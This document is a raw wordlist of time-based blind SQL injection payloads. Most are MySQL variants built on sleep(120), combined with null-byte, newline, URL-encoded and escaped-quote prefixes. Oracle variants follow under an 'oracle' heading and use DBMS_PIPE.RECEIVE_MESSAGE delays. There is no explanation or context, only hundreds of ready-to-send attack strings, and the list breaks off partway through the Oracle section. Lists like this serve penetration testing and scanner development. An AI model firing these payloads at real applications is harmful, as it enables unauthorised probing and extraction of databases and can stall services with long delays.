0x00\\';select sleep(120) -- 
0x00sleep(120)
0x00sleep(120) -- 
0x0a and 1337=(select 1337 from (select sleep(120))A)
0x0a and 1337=(select 1337 from (select sleep(120))A) -- 
0x0a and sleep(120)
0x0a and sleep(120) -- 
0x0a or 1337=(select 1337 from (select sleep(120))A)
0x0a or 1337=(select 1337 from (select sleep(120))A) -- 
0x0a or sleep(120)
0x0a or sleep(120) -- 
0x0a' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0a' and sleep(120) -- 
0x0a' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0a' or sleep(120) -- 
0x0a';select sleep(120) -- 
0x0a;select sleep(120)
0x0a;select sleep(120) -- 
0x0a\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0a\' and sleep(120) -- 
0x0a\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0a\' or sleep(120) -- 
0x0a\';select sleep(120) -- 
0x0a\\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0a\\' and sleep(120) -- 
0x0a\\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0a\\' or sleep(120) -- 
0x0a\\';select sleep(120) -- 
0x0asleep(120)
0x0asleep(120) -- 
0x0d0a and 1337=(select 1337 from (select sleep(120))A)
0x0d0a and 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a and sleep(120)
0x0d0a and sleep(120) -- 
0x0d0a or 1337=(select 1337 from (select sleep(120))A)
0x0d0a or 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a or sleep(120)
0x0d0a or sleep(120) -- 
0x0d0a' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a' and sleep(120) -- 
0x0d0a' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a' or sleep(120) -- 
0x0d0a';select sleep(120) -- 
0x0d0a;select sleep(120)
0x0d0a;select sleep(120) -- 
0x0d0a\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a\' and sleep(120) -- 
0x0d0a\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a\' or sleep(120) -- 
0x0d0a\';select sleep(120) -- 
0x0d0a\\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a\\' and sleep(120) -- 
0x0d0a\\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a\\' or sleep(120) -- 
0x0d0a\\';select sleep(120) -- 
0x0d0asleep(120)
0x0d0asleep(120) -- 
;select sleep(120)
;select sleep(120) -- 
\' and 1337=(select 1337 from (select sleep(120))A) -- 
\' and sleep(120) -- 
\' or 1337=(select 1337 from (select sleep(120))A) -- 
\' or sleep(120) -- 
\';select sleep(120) -- 
\\' and 1337=(select 1337 from (select sleep(120))A) -- 
\\' and sleep(120) -- 
\\' or 1337=(select 1337 from (select sleep(120))A) -- 
\\' or sleep(120) -- 
\\';select sleep(120) -- 
\\n and 1337=(select 1337 from (select sleep(120))A)
\\n and 1337=(select 1337 from (select sleep(120))A) -- 
\\n and sleep(120)
\\n and sleep(120) -- 
\\n or 1337=(select 1337 from (select sleep(120))A)
\\n or 1337=(select 1337 from (select sleep(120))A) -- 
\\n or sleep(120)
\\n or sleep(120) -- 
\\n' and 1337=(select 1337 from (select sleep(120))A) -- 
\\n' and sleep(120) -- 
\\n' or 1337=(select 1337 from (select sleep(120))A) -- 
\\n' or sleep(120) -- 
\\n';select sleep(120) -- 
\\n;select sleep(120)
\\n;select sleep(120) -- 
\\n\\' and 1337=(select 1337 from (select sleep(120))A) -- 
\\n\\' and sleep(120) -- 
\\n\\' or 1337=(select 1337 from (select sleep(120))A) -- 
\\n\\' or sleep(120) -- 
\\n\\';select sleep(120) -- 
\\nsleep(120)
\\nsleep(120) -- 
\\r\\n and 1337=(select 1337 from (select sleep(120))A)
\\r\\n and 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n and sleep(120)
\\r\\n and sleep(120) -- 
\\r\\n or 1337=(select 1337 from (select sleep(120))A)
\\r\\n or 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n or sleep(120)
\\r\\n or sleep(120) -- 
\\r\\n' and 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n' and sleep(120) -- 
\\r\\n' or 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n' or sleep(120) -- 
\\r\\n';select sleep(120) -- 
\\r\\n;select sleep(120)
\\r\\n;select sleep(120) -- 
\\r\\n\\' and 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n\\' and sleep(120) -- 
\\r\\n\\' or 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n\\' or sleep(120) -- 
\\r\\n\\';select sleep(120) -- 
\\r\\nsleep(120)
\\r\\nsleep(120) -- 
\n and 1337=(select 1337 from (select sleep(120))A)
\n and 1337=(select 1337 from (select sleep(120))A) -- 
\n and sleep(120)
\n and sleep(120) -- 
\n or 1337=(select 1337 from (select sleep(120))A)
\n or 1337=(select 1337 from (select sleep(120))A) -- 
\n or sleep(120)
\n or sleep(120) -- 
\n' and 1337=(select 1337 from (select sleep(120))A) -- 
\n' and sleep(120) -- 
\n' or 1337=(select 1337 from (select sleep(120))A) -- 
\n' or sleep(120) -- 
\n';select sleep(120) -- 
\n;select sleep(120)
\n;select sleep(120) -- 
\n\' and 1337=(select 1337 from (select sleep(120))A) -- 
\n\' and sleep(120) -- 
\n\' or 1337=(select 1337 from (select sleep(120))A) -- 
\n\' or sleep(120) -- 
\n\';select sleep(120) -- 
\nsleep(120)
\nsleep(120) -- 
\r\n and 1337=(select 1337 from (select sleep(120))A)
\r\n and 1337=(select 1337 from (select sleep(120))A) -- 
\r\n and sleep(120)
\r\n and sleep(120) -- 
\r\n or 1337=(select 1337 from (select sleep(120))A)
\r\n or 1337=(select 1337 from (select sleep(120))A) -- 
\r\n or sleep(120)
\r\n or sleep(120) -- 
\r\n' and 1337=(select 1337 from (select sleep(120))A) -- 
\r\n' and sleep(120) -- 
\r\n' or 1337=(select 1337 from (select sleep(120))A) -- 
\r\n' or sleep(120) -- 
\r\n';select sleep(120) -- 
\r\n;select sleep(120)
\r\n;select sleep(120) -- 
\r\n\' and 1337=(select 1337 from (select sleep(120))A) -- 
\r\n\' and sleep(120) -- 
\r\n\' or 1337=(select 1337 from (select sleep(120))A) -- 
\r\n\' or sleep(120) -- 
\r\n\';select sleep(120) -- 
\r\nsleep(120)
\r\nsleep(120) -- 
sleep(120)
sleep(120) --

oracle

1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND ('1337'='1337) 
AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND (1337=1337
 and 1337=dbms_pipe.receive_message(('a'),120)
 and 1337=dbms_pipe.receive_message(('a'),120) -- 
 and 1337=dbms_pipe.receive_message((\'a\'),120)
 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
 and 1337=dbms_pipe.receive_message(1,120)
 and 1337=dbms_pipe.receive_message(1,120) -- 
 or 1337=dbms_pipe.receive_message(('a'),120)
 or 1337=dbms_pipe.receive_message(('a'),120) -- 
 or 1337=dbms_pipe.receive_message((\'a\'),120)
 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
 or 1337=dbms_pipe.receive_message(1,120)
 or 1337=dbms_pipe.receive_message(1,120) -- 
%00 and 1337=dbms_pipe.receive_message(('a'),120)
%00 and 1337=dbms_pipe.receive_message(('a'),120) -- 
%00 and 1337=dbms_pipe.receive_message((\'a\'),120)
%00 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%00 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00 and 1337=dbms_pipe.receive_message(1,120)
%00 and 1337=dbms_pipe.receive_message(1,120) -- 
%00 or 1337=dbms_pipe.receive_message(('a'),120)
%00 or 1337=dbms_pipe.receive_message(('a'),120) -- 
%00 or 1337=dbms_pipe.receive_message((\'a\'),120)
%00 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%00 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00 or 1337=dbms_pipe.receive_message(1,120)
%00 or 1337=dbms_pipe.receive_message(1,120) -- 
%00' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%00' and 1337=dbms_pipe.receive_message(1,120) -- 
%00' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%00' or 1337=dbms_pipe.receive_message(1,120) -- 
%00';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%00';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%00\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00\' and 1337=dbms_pipe.receive_message(1,120) -- 
%00\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00\' or 1337=dbms_pipe.receive_message(1,120) -- 
%00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%00\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%00\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a and 1337=dbms_pipe.receive_message(('a'),120)
%0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a and 1337=dbms_pipe.receive_message((\'a\'),120)
%0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a and 1337=dbms_pipe.receive_message(1,120)
%0a and 1337=dbms_pipe.receive_message(1,120) -- 
%0a or 1337=dbms_pipe.receive_message(('a'),120)
%0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a or 1337=dbms_pipe.receive_message((\'a\'),120)
%0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a or 1337=dbms_pipe.receive_message(1,120)
%0a or 1337=dbms_pipe.receive_message(1,120) -- 
%0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a and 1337=dbms_pipe.receive_message(('a'),120)
%0d%0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message((\'a\'),120)
%0d%0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0d%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message(1,120)
%0d%0a and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a or 1337=dbms_pipe.receive_message(('a'),120)
%0d%0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message((\'a\'),120)
%0d%0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0d%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message(1,120)
%0d%0a or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%0d%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0d%0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%0d%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%0d%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
' and 1337=dbms_pipe.receive_message(('a'),120) -- 
' and 1337=dbms_pipe.receive_message(1,120) -- 
' or 1337=dbms_pipe.receive_message(('a'),120) -- 
' or 1337=dbms_pipe.receive_message(1,120) -- 
';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00 and 1337=dbms_pipe.receive_message(('a'),120)
0x00 and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00 and 1337=dbms_pipe.receive_message((\'a\'),120)
0x00 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x00 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00 and 1337=dbms_pipe.receive_message(1,120)
0x00 and 1337=dbms_pipe.receive_message(1,120) -- 
0x00 or 1337=dbms_pipe.receive_message(('a'),120)
0x00 or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00 or 1337=dbms_pipe.receive_message((\'a\'),120)
0x00 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x00 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00 or 1337=dbms_pipe.receive_message(1,120)
0x00 or 1337=dbms_pipe.receive_message(1,120) -- 
0x00' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x00';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x00\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a and 1337=dbms_pipe.receive_message(('a'),120)
0x0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a and 1337=dbms_pipe.receive_message((\'a\'),120)
0x0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a and 1337=dbms_pipe.receive_message(1,120)
0x0a and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a or 1337=dbms_pipe.receive_message(('a'),120)
0x0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a or 1337=dbms_pipe.receive_message((\'a\'),120)
0x0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a or 1337=dbms_pipe.receive_message(1,120)
0x0a or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a and 1337=dbms_pipe.receive_message(('a'),120)
0x0d0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message((\'a\'),120)
0x0d0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0d0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message(1,120)
0x0d0a and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a or 1337=dbms_pipe.receive_message(('a'),120)
0x0d0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message((\'a\'),120)
0x0d0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0d0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message(1,120)
0x0d0a or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x0d0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0d0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x0d0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x0d0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\' and 1337=dbms_pipe.receive_message(1,120) -- 
\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\' or 1337=dbms_pipe.receive_message(1,120) -- 
\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\n and 1337=dbms_pipe.receive_message(('a'),120)
\\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n and 1337=dbms_pipe.receive_message(1,120)
\\n and 1337=dbms_pipe.receive_message(1,120) -- 
\\n or 1337=dbms_pipe.receive_message(('a'),120)
\\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n or 1337=dbms_pipe.receive_message(1,120)
\\n or 1337=dbms_pipe.receive_message(1,120) -- 
\\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
